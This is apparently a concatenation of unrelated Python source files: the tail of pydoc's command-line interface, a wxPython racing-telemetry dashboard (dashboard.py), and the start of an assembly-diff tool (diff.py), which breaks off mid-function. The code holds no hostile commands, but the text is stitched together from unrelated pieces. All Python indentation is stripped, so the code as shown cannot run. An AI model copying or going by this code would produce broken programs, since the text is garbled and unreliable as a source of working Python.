cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
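# Minimal programmatic sketch (illustrative, not executed): the same server can be
# driven without the interactive 'server>' prompt by calling _start_server() directly:
#     thread = _start_server(_url_handler, 0)
#     if thread.serving:
#         print('Documentation server running at', thread.url)
#         thread.stop()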
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and os.sep in x
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bgk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if start_server:
if port is None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -g
Deprecated.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
dashboard.py
from json import load
from multiprocessing import Manager, Process
from os import path
import wx
from util.led import DashLEDController
from util.telemetry import Telemetry
from util.ui import UIElements
from workers.dashboard_background import worker
class DashboardFrame(wx.Frame):
def __init__(self, *args, **kwds):
# Instantiate utility classes
self.ui = UIElements()
self.telemetry = Telemetry()
self.led_controller = DashLEDController(self.telemetry)
# Setup initial style and frame properties
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE | wx.STAY_ON_TOP
wx.Frame.__init__(self, *args, **kwds)
self.SetCursor(wx.Cursor(wx.CURSOR_BLANK))
# Set window properties & start timer
self._set_window_properties()
self._start_timer()
# Create the main window panel
self.main_panel = wx.Panel(self, wx.ID_ANY)
main_sizer = wx.BoxSizer(wx.VERTICAL)
# Create a horizontal sizer to hold the columns
column_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(column_sizer, 1, wx.EXPAND, 0)
# Create the left-side column
self.column_a = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_a, 1, wx.EXPAND, 0)
# Draw UI elements
self.ui.draw_tire_temperature_elements(self)
self.ui.draw_fuel_elements(self)
# Create the middle column
self.column_b = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_b, 1, wx.EXPAND, 0)
# Draw UI Elements
self.ui.draw_gear_and_speed_elements(self)
# Create the right-side column
self.column_c = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_c, 1, wx.EXPAND, 0)
# Draw UI Elements
self.ui.draw_lap_time_elements(self)
self.ui.draw_lap_and_position_elements(self)
# Re-size the screen as needed after elements are populated
self.main_panel.SetSizer(main_sizer)
self.Layout()
def update(self, _):
# Load a copy of the data so we know when it changes
self.telemetry.load(dashboard_data.copy())
# Ensure at least one packet has been parsed
if len(dashboard_data.keys()) == 0 or not dashboard_data['active']:
# Turn off any LEDs and stop logic
self.led_controller.clear_status()
return
# Update LED Controller status
self.led_controller.update_status()
tire_temp = self.telemetry.tire_temperature
# Tire Temp FL
fl_tire = tire_temp['FL']
self.tire_temp_FL.SetLabel(str(round(fl_tire['value'])))
self.tire_temp_FL.SetForegroundColour(wx.Colour(fl_tire['color']))
# Tire Temp FR
fr_tire = tire_temp['FR']
self.tire_temp_FR.SetLabel(str(round(fr_tire['value'])))
self.tire_temp_FR.SetForegroundColour(wx.Colour(fr_tire['color']))
# Tire Temp RL
rl_tire = tire_temp['RL']
self.tire_temp_RL.SetLabel(str(round(rl_tire['value'])))
self.tire_temp_RL.SetForegroundColour(wx.Colour(rl_tire['color']))
# Tire Temp RR
rr_tire = tire_temp['RR']
self.tire_temp_RR.SetLabel(str(round(rr_tire['value'])))
self.tire_temp_RR.SetForegroundColour(wx.Colour(rr_tire['color']))
# Update Speed & Gear
self.speed_value.SetLabel(str(dashboard_data['speed']))
self.gear_num_value.SetLabel(str(self.telemetry.gear))
# Update Fuel level values
self.total_fuel_value.SetLabel(self.telemetry.fuel_level)
self.fuel_per_lap_value.SetLabel(self.telemetry.fuel_percent_per_lap)
# Set Lap Time/Time Gain
self.lap_time_value.SetLabel(self.telemetry.lap_time)
time_gain = self.telemetry.time_gain
self.time_gain_value.SetLabel(time_gain['value'])
self.time_gain_value.SetForegroundColour(time_gain['color'])
# Set Lap Number & Position
self.lap_num_value.SetLabel(str(dashboard_data['lap_num'] + 1))
self.position_value.SetLabel(str(dashboard_data['race_position']))
def _start_timer(self, update_in_ms=50):
'''Start the update timer to refresh values on the UI'''
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.update, self.timer)
self.timer.Start(update_in_ms)
def _set_window_properties(self):
'''Set the core window properties such as title, size, background, etc.'''
self.SetSize((800, 480))
self.SetMinSize((800, 480))
self.SetTitle("Dashboard GUI")
self.SetBackgroundColour(wx.Colour(0, 0, 0))
class DashboardApp(wx.App):
maximized = True
# OnInit is called after wx.App.__init__ is finished
def OnInit(self):
# Create the main dashboard frame
self.dashboard_frame = DashboardFrame(None, wx.ID_ANY, "")
self.SetTopWindow(self.dashboard_frame)
# Show the frame and full-screen it by default
self.dashboard_frame.Show()
self.dashboard_frame.ShowFullScreen(True, style=wx.FULLSCREEN_ALL)
# Bind to the KEY_DOWN event for keyboard shortcuts
self.Bind(wx.EVT_KEY_DOWN, self._on_key_down)
# wx requires we return a bool from our OnInit method
return True
def _on_key_down(self, event):
# Get the key code for the key pressed
key_code = self._get_key_code(event)
# Clear stints
if key_code == wx.WXK_F10:
self.dashboard_frame.telemetry.clear_stints()
# Full-screen
if key_code == wx.WXK_F11:
self.maximized = not self.maximized
self.dashboard_frame.ShowFullScreen(self.maximized, style=wx.FULLSCREEN_ALL)
# Exiting
elif key_code == wx.WXK_ESCAPE:
self.dashboard_frame.Close()
worker_process.terminate()
exit(0)
def _get_key_code(self, event):
# Printable characters
key_code = event.GetUnicodeKey()
if key_code != wx.WXK_NONE:
return key_code
# Special characters
return event.GetKeyCode()
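# Illustrative only: judging from the reads in DashboardFrame.update() above, the
# background worker is expected to fill dashboard_data with at least keys such as
#     {'active': True, 'speed': 128, 'lap_num': 3, 'race_position': 5, ...}
# plus whatever fields util.telemetry.Telemetry uses to derive tire temperatures,
# fuel levels and lap times. The example values here are made up.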
with Manager() as manager:
# Create shared dict for the worker and UI to use
dashboard_data = manager.dict({})
# Create the base app
app = DashboardApp()
# Load the configuration for the worker
if not path.isfile('config.json'):
raise Exception('config.json file is missing - please follow setup instructions.')
with open("config.json", "r") as f:
config = load(f)
# Start the background worker process
args = (dashboard_data, config['version'], config['host'], config['port'])
worker_process = Process(target=worker, args=args)
worker_process.start()
# Run the main wx loop
app.MainLoop()
diff.py
#!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete # type: ignore
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(description="Diff MIPS, PPC or AArch64 assembly.")
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="Diff .o files rather than a whole binary. This makes it possible to "
"see symbol names. (Recommended)",
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="Diff a given function in two ELFs, one being stripped and the other "
"one non-stripped. Requires objdump from binutils 2.33+.",
)
parser.add_argument(
"--source",
action="store_true",
help="Show source code (if possible). Only works with -o and -e.",
)
parser.add_argument(
"--source-old-binutils",
action="store_true",
help="Tweak --source handling to make it work with binutils < 2.33. Implies --source.",
)
parser.add_argument(
"--inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o and -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
type=int,
default=0,
metavar="LINES",
help="Skip the first N lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="Stop disassembling at the first 'jr ra'. Some functions have multiple return points, so use with care!",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
type=str,
default="0",
help="Diff position X in our img against position X + shift in the base img. "
'Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable '
"flag to pass if it is known that position 0x1234 in the base img syncs "
"up with position 0x4321 in our img. Not supported together with -o.",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="Automatically update when source/object files change. "
"Recommended in combination with -m.",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="Show a three-way diff between target asm, current asm, and asm "
"prior to -w rebuild. Requires -w.",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="Show a three-way diff between target asm, current asm, and asm "
"when diff.py was started. Requires -w.",
)
parser.add_argument(
"--width",
dest="column_width",
type=int,
default=50,
help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="Diff algorithm to use. Levenshtein gives the minimum diff, while difflib "
"aims for long sections of equal opcodes. Defaults to %(default)s.",
)
parser.add_argument(
"--max-size",
"--max-lines",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="Disable the pager; write output directly to stdout, then exit. "
"Incompatible with --watch.",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html"),
default="color",
help="Output format, default is color. --format=html implies --no-pager.",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from dataclasses import dataclass, field, replace
import difflib
import enum
import html
import itertools
import os
import queue
import re
import string
import subprocess
import threading
import time
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama ansiwrap watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Fore, Style # type: ignore
import ansiwrap # type: ignore
import watchdog # type: ignore
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
make: bool
source: bool
source_old_binutils: bool
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
show_branches: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
else:
raise ValueError(f"Unsupported --format: {args.format}")
return Config(
arch=get_arch(project.arch_str),
# Build/objdump options
diff_obj=args.diff_obj,
make=args.make,
source=args.source or args.source_old_binutils,
source_old_binutils=args.source_old_binutils,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
show_branches=args.show_branches,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
for objdump_cand in ["mips-linux-gnu-objdump", "mips64-elf-objdump"]:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
"Missing binutils; please ensure mips-linux-gnu-objdump or mips64-elf-objdump exist, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
if arch_str == "mips":
return MIPS_SETTINGS
if arch_str == "aarch64":
return AARCH64_SETTINGS
if arch_str == "ppc":
return PPC_SETTINGS
return fail(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c repaints the screen from the top line down instead of scrolling from the bottom
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(
self, line: Optional[str] = None, f: Format = BasicFormat.NONE
) -> None:
self.segments = []
if line is not None:
self.segments.append((line, f))
elif f is not BasicFormat.NONE:
raise ValueError("Text constructor provided `f`, but no line to format")
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
result.segments = other.segments + self.segments
return result
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
result.segments.append((chunk[i:], f))
return result
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
"""Format a multi-column table with an optional `header`"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
if header:
lines = [header] + lines
return "\n".join(
"".join(x.ljust(self.column_width) for x in line) for line in lines
)
@dataclass
class AnsiFormatter(Formatter):
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.BRIGHT,
# Underline (not in colorama) + bright
BasicFormat.SOURCE_FUNCTION: Style.BRIGHT + "\u001b[4m",
BasicFormat.SOURCE_OTHER: Style.DIM,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{Style.RESET_ALL}"
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
if header:
lines = [header] + lines
return "\n".join("".join(self.ansi_ljust(x) for x in line) for line in lines)
def ansi_ljust(self, s: str) -> str:
"""Like s.ljust(width), but accounting for ANSI colors."""
needed: int = self.column_width - ansiwrap.ansilen(s)
if needed > 0:
return s + " " * needed
else:
return s
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
def table_row(line: Tuple[str, ...], cell_el: str) -> str:
output_row = " <tr>"
for cell in line:
output_row += f"<{cell_el}>{cell}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
if header:
output += " <thead>\n"
output += table_row(header, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(table_row(line, "td") for line in lines)
output += " </tbody>\n"
output += "</table>\n"
return output
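# Illustrative sketch (not executed): Formatter.apply() walks the Text segments and
# delegates each chunk to apply_format(), so e.g.
#     HtmlFormatter().apply(Text("beq", BasicFormat.DIFF_ADD))
# yields a span tagged with the 'diff-add' class, while
#     PlainFormatter(column_width=50).apply(Text("beq", BasicFormat.DIFF_ADD))
# returns the bare string "beq".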
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
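# A tiny, uncalled demo of the behaviour above (illustrative sketch only).
def _symbol_formatter_demo() -> None:
    """Show that symbol_formatter() hands out one stable RotationFormat per
    distinct symbol, so e.g. the same register name gets the same rotation
    color on every occurrence within a group."""
    fmt = symbol_formatter("demo", 0)
    assert fmt("$a0") == fmt("$a0")   # repeated symbol -> same format
    assert fmt("$a0") != fmt("$a1")   # new symbol -> next rotation index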
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> int:
return int(expr.strip().replace(":", ""), 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str, config: Config) -> str:
out: List[str] = []
search = f"<{fn_name}>:"
found = False
for line in dump.split("\n"):
if found:
if len(out) >= config.max_function_size_lines:
break
out.append(line)
elif search in line:
found = True
return "\n".join(out)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
if not config.source:
return []
flags = [
"--source",
"-l",
]
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
if restrict is not None:
return restrict_to_function(out, restrict, config)
return out
def search_map_file(
fn_name: str, project: ProjectSettings
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" .text"):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
import traceback
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of \.(?:init|text)\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = ["-drz", "-j", ".text"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile, _ = search_map_file(start, project)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
objdump_flags = ["-drz"]
return (
objfile,
(objdump_flags, refobjfile, start),
